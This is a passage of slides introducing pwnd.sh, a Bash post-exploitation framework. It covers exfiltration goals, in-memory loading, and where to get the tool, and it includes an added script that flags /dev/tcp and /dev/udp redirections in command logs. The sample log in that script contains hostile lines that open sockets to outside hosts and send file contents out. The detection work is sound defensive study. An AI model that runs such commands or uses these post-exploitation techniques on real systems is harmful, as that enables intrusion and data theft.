5. What are the plans in the Post-Exploitation Phase?
3 possible things:
● Further penetrate into Network / Endpoints
● Get a firmer foothold on the Network / Endpoints
● Start Exfiltrating Data out of the Network / Endpoints
6. About the tool
● Newly released
● Easy to use, as it is written in Bash
● Interactive, and allows creating custom scripts
● License: 3-Clause BSD
● Both In-Memory and On-Disk deployment available
● Pipelines also let pwnd.sh integrate with other programs
7. How can I get it?
> git clone https://github.com/SafeBreach-Labs/pwndsh.git
> cd pwndsh
8. Why Bash and not Python / Perl / Ruby?
● The same Bash works across different platforms (Mac, Linux, etc.) and different architectures (x86, x64)
● It is the default shell on most systems
● There is socket programming in Bash (--enable-net-redirections)
● You cannot fall back to Bash from Python, Perl, etc., but you can UPGRADE to Python, Perl, etc. from Bash
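With `--enable-net-redirections`, Bash itself opens a socket whenever a redirection targets `/dev/tcp/HOST/PORT` or `/dev/udp/HOST/PORT`, so those paths are something a defender can search for in command logs. The script below is an added example, not part of the original slides or of pwnd.sh; the `id user command...` log layout, the function names and the sample lines are constructed assumptions.

```shell
#!/bin/sh
# Added example (not from the slides or pwnd.sh): flag Bash network
# redirections in logged command lines. Bash built with
# --enable-net-redirections opens a socket itself when a redirection
# targets /dev/tcp/HOST/PORT or /dev/udp/HOST/PORT.

# Constructed sample log; the "id user command..." layout is an assumption.
sample_log() {
cat <<'EOF'
1001 alice ls -la /var/log
1002 www-data exec 3<>/dev/tcp/192.0.2.10/443
1003 bob cat /dev/null > /tmp/out
1004 www-data cat /etc/hostname > /dev/udp/198.51.100.7/53
1005 carol grep -r "/dev/tcp" /usr/share/doc/bash
EOF
}

# Reads log lines on stdin; prints one finding per line that contains a
# redirection operator followed by /dev/(tcp|udp)/HOST/PORT.
flag_net_redirections() {
    awk '
    BEGIN {
        # Operator, optional "&", optional blanks, then the pseudo-path.
        re = "[<>]&?[ \t]*/dev/(tcp|udp)/[^/ \t]+/[A-Za-z0-9_-]+"
    }
    match($0, re) {
        hit = substr($0, RSTART, RLENGTH)
        sub("^[<>]&?[ \t]*/dev/", "", hit)      # leaves proto/host/port
        split(hit, part, "/")
        printf "%s user=%s proto=%s host=%s port=%s\n", $1, $2, part[1], part[2], part[3]
    }'
}

# Lines 1003 and 1005 are not flagged: one redirects to an ordinary file,
# the other only mentions the path as a search string.
sample_log | flag_net_redirections
```

Requiring a redirection operator in front of the path is what keeps documentation searches and similar benign mentions out of the findings.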
9. Dependencies, or not to be dependent?
● No:
– Consistent functionality across different platforms, CPUs, etc.
– Smaller and simpler code base
● Yes:
– Don't reinvent the wheel
– Everything is a dependency in shell terms (ls, cat, etc.)
(Good coders create, great coders reuse)
PWND.SH – built with the least amount of dependencies
10. Why In-memory?
● Constraints found:
– Filesystem is read-only
– “No space left on device”
Solution: In-memory loading
● Works even if the filesystem is mounted read-only
● Multiple versions can co-exist (in multiple shells)
● Disappears after reboot